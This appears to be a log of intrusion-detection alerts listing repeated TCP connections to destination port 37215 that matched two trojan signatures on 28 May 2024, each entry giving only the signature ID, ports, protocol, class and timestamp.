          SID:2829579
          Source Port:45236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146093
          SID:2829579
          Source Port:48300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062202
          SID:2835222
          Source Port:46326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650603
          SID:2829579
          Source Port:57218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.534681
          SID:2835222
          Source Port:60102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.707359
          SID:2835222
          Source Port:40038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650324
          SID:2829579
          Source Port:48714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067238
          SID:2829579
          Source Port:50930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651262
          SID:2829579
          Source Port:33280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281586
          SID:2835222
          Source Port:47328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325755
          SID:2829579
          Source Port:47990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113258
          SID:2835222
          Source Port:44260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542282
          SID:2829579
          Source Port:37472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267448
          SID:2829579
          Source Port:40574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989077
          SID:2835222
          Source Port:39014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267565
          SID:2835222
          Source Port:48052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324245
          SID:2835222
          Source Port:60056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.009978
          SID:2829579
          Source Port:58938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552771
          SID:2829579
          Source Port:59716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221755
          SID:2835222
          Source Port:49368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405235
          SID:2835222
          Source Port:44274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949666
          SID:2829579
          Source Port:56386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297516
          SID:2829579
          Source Port:59816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979255
          SID:2829579
          Source Port:49964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482802
          SID:2835222
          Source Port:37674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.130723
          SID:2829579
          Source Port:49014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.546980
          SID:2829579
          Source Port:53880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548499
          SID:2835222
          Source Port:48092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138012
          SID:2835222
          Source Port:57900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842459
          SID:2829579
          Source Port:47912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222787
          SID:2835222
          Source Port:34528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.231715
          SID:2835222
          Source Port:48156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465364
          SID:2835222
          Source Port:48020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.075860
          SID:2835222
          Source Port:50934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845751
          SID:2835222
          Source Port:51148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794238
          SID:2829579
          Source Port:36392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.114372
          SID:2829579
          Source Port:44156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809309
          SID:2829579
          Source Port:55402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210448
          SID:2829579
          Source Port:36918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728938
          SID:2829579
          Source Port:58740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923487
          SID:2835222
          Source Port:50192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735461
          SID:2835222
          Source Port:51476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.327693
          SID:2829579
          Source Port:44618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033246
          SID:2829579
          Source Port:54198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548646
          SID:2829579
          Source Port:55086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755998
          SID:2835222
          Source Port:46640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891874
          SID:2829579
          Source Port:39866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812797
          SID:2829579
          Source Port:58106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.177927
          SID:2835222
          Source Port:33638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.000749
          SID:2835222
          Source Port:53554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033281
          SID:2829579
          Source Port:39958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838787
          SID:2835222
          Source Port:56638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321182
          SID:2835222
          Source Port:60834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204101
          SID:2835222
          Source Port:58916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156202
          SID:2829579
          Source Port:40732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724334
          SID:2835222
          Source Port:59222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868959
          SID:2829579
          Source Port:58384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590802
          SID:2835222
          Source Port:58396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977334
          SID:2829579
          Source Port:39160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271681
          SID:2829579
          Source Port:59072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528960
          SID:2829579
          Source Port:60782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337406
          SID:2835222
          Source Port:57048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847593
          SID:2829579
          Source Port:38130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161709
          SID:2835222
          Source Port:56428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876056
          SID:2829579
          Source Port:58920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.819452
          SID:2835222
          Source Port:58980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.603888
          SID:2835222
          Source Port:33394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.015877
          SID:2835222
          Source Port:48768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.926573
          SID:2835222
          Source Port:51184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889202
          SID:2829579
          Source Port:48810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.280890
          SID:2835222
          Source Port:51964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.533108
          SID:2829579
          Source Port:55042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708922
          SID:2835222
          Source Port:46148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543137
          SID:2835222
          Source Port:60108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659020
          SID:2829579
          Source Port:46276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.306705
          SID:2835222
          Source Port:57852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.229894
          SID:2829579
          Source Port:51066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269712
          SID:2835222
          Source Port:43506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161428
          SID:2829579
          Source Port:56754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217195
          SID:2829579
          Source Port:50400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743699
          SID:2829579
          Source Port:54910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959640
          SID:2829579
          Source Port:59980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298261
          SID:2835222
          Source Port:42958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547840
          SID:2835222
          Source Port:42394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841091
          SID:2835222
          Source Port:44658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341297
          SID:2835222
          Source Port:56214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513143
          SID:2835222
          Source Port:55414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131725
          SID:2835222
          Source Port:34112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960707
          SID:2835222
          Source Port:57548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551767
          SID:2829579
          Source Port:33036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216392
          SID:2829579
          Source Port:41728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473712
          SID:2829579
          Source Port:40512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295355
          SID:2829579
          Source Port:45402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839491
          SID:2835222
          Source Port:56070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914323
          SID:2835222
          Source Port:38038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845479
          SID:2829579
          Source Port:58940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475607
          SID:2829579
          Source Port:53614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.556738
          SID:2829579
          Source Port:40642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707733
          SID:2829579
          Source Port:53594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293133
          SID:2835222
          Source Port:43074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176397
          SID:2835222
          Source Port:50076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979342
          SID:2835222
          Source Port:54162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.307235
          SID:2829579
          Source Port:51532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885578
          SID:2835222
          Source Port:40324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480809
          SID:2829579
          Source Port:51518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.606905
          SID:2835222
          Source Port:36812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666544
          SID:2829579
          Source Port:34590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090443
          SID:2829579
          Source Port:59516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.683216
          SID:2835222
          Source Port:51378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093252
          SID:2835222
          Source Port:35262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845721
          SID:2829579
          Source Port:53562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.823268
          SID:2829579
          Source Port:55254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441934
          SID:2835222
          Source Port:51462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465209
          SID:2829579
          Source Port:36256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093806
          SID:2835222
          Source Port:49678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980784
          SID:2835222
          Source Port:50096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.059578
          SID:2829579
          Source Port:34056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087998
          SID:2835222
          Source Port:45938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.236875
          SID:2829579
          Source Port:57832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474458
          SID:2829579
          Source Port:37686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946596
          SID:2835222
          Source Port:37482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227944
          SID:2835222
          Source Port:58600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.425117
          SID:2835222
          Source Port:36390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806486
          SID:2829579
          Source Port:33812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590718
          SID:2835222
          Source Port:56552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979304
          SID:2829579
          Source Port:35796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352743
          SID:2829579
          Source Port:43430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.986060
          SID:2835222
          Source Port:43324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271042
          SID:2829579
          Source Port:59730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291589
          SID:2835222
          Source Port:34678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234606
          SID:2829579
          Source Port:55340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481141
          SID:2835222
          Source Port:52072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.942325
          SID:2829579
          Source Port:58030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.088098
          SID:2829579
          Source Port:45652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671919
          SID:2829579
          Source Port:53164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893547
          SID:2829579
          Source Port:40018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.768667
          SID:2835222
          Source Port:60144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976827
          SID:2835222
          Source Port:40262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.799781
          SID:2829579
          Source Port:57256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561114
          SID:2835222
          Source Port:57966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962848
          SID:2829579
          Source Port:36352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793381
          SID:2835222
          Source Port:49106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.351113
          SID:2829579
          Source Port:51198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465096
          SID:2835222
          Source Port:49480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530289
          SID:2835222
          Source Port:34052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543182
          SID:2829579
          Source Port:45804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.919027
          SID:2835222
          Source Port:46154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772155
          SID:2829579
          Source Port:51032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144979
          SID:2835222
          Source Port:42848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.243706
          SID:2829579
          Source Port:38726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.233465
          SID:2835222
          Source Port:57728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357168
          SID:2835222
          Source Port:48466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.984881
          SID:2829579
          Source Port:35568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143863
          SID:2835222
          Source Port:49516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.868296
          SID:2835222
          Source Port:42956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247171
          SID:2835222
          Source Port:50076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921083
          SID:2829579
          Source Port:55276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959689
          SID:2835222
          Source Port:53314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.819429
          SID:2829579
          Source Port:38062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590655
          SID:2835222
          Source Port:34822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711252
          SID:2835222
          Source Port:43030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215990
          SID:2829579
          Source Port:44490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112107
          SID:2835222
          Source Port:34280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229841
          SID:2829579
          Source Port:50732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207004
          SID:2829579
          Source Port:35556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178428
          SID:2835222
          Source Port:59872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213880
          SID:2835222
          Source Port:57640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268598
          SID:2829579
          Source Port:55960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066613
          SID:2829579
          Source Port:55490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727014
          SID:2829579
          Source Port:39504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742274
          SID:2835222
          Source Port:42460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711180
          SID:2835222
          Source Port:35320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.862964
          SID:2829579
          Source Port:35390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922760
          SID:2835222
          Source Port:52980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.348940
          SID:2829579
          Source Port:44402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334315
          SID:2835222
          Source Port:35734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.690321
          SID:2835222
          Source Port:45294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543243
          SID:2835222
          Source Port:34932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803384
          SID:2835222
          Source Port:39652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591197
          SID:2835222
          Source Port:60770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652436
          SID:2829579
          Source Port:57712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482754
          SID:2829579
          Source Port:45936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112273
          SID:2835222
          Source Port:52496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756322
          SID:2835222
          Source Port:42828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211856
          SID:2835222
          Source Port:58166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.189076
          SID:2835222
          Source Port:51710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336515
          SID:2835222
          Source Port:58546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126804
          SID:2829579
          Source Port:52640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217181
          SID:2829579
          Source Port:36280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820231
          SID:2829579
          Source Port:36118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887288
          SID:2835222
          Source Port:35630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.668456
          SID:2829579
          Source Port:37114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215815
          SID:2835222
          Source Port:35972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215198
          SID:2835222
          Source Port:50278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087879
          SID:2835222
          Source Port:55016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797189
          SID:2835222
          Source Port:51664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215801
          SID:2835222
          Source Port:47498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669322
          SID:2829579
          Source Port:44672
          Destination Port:37215
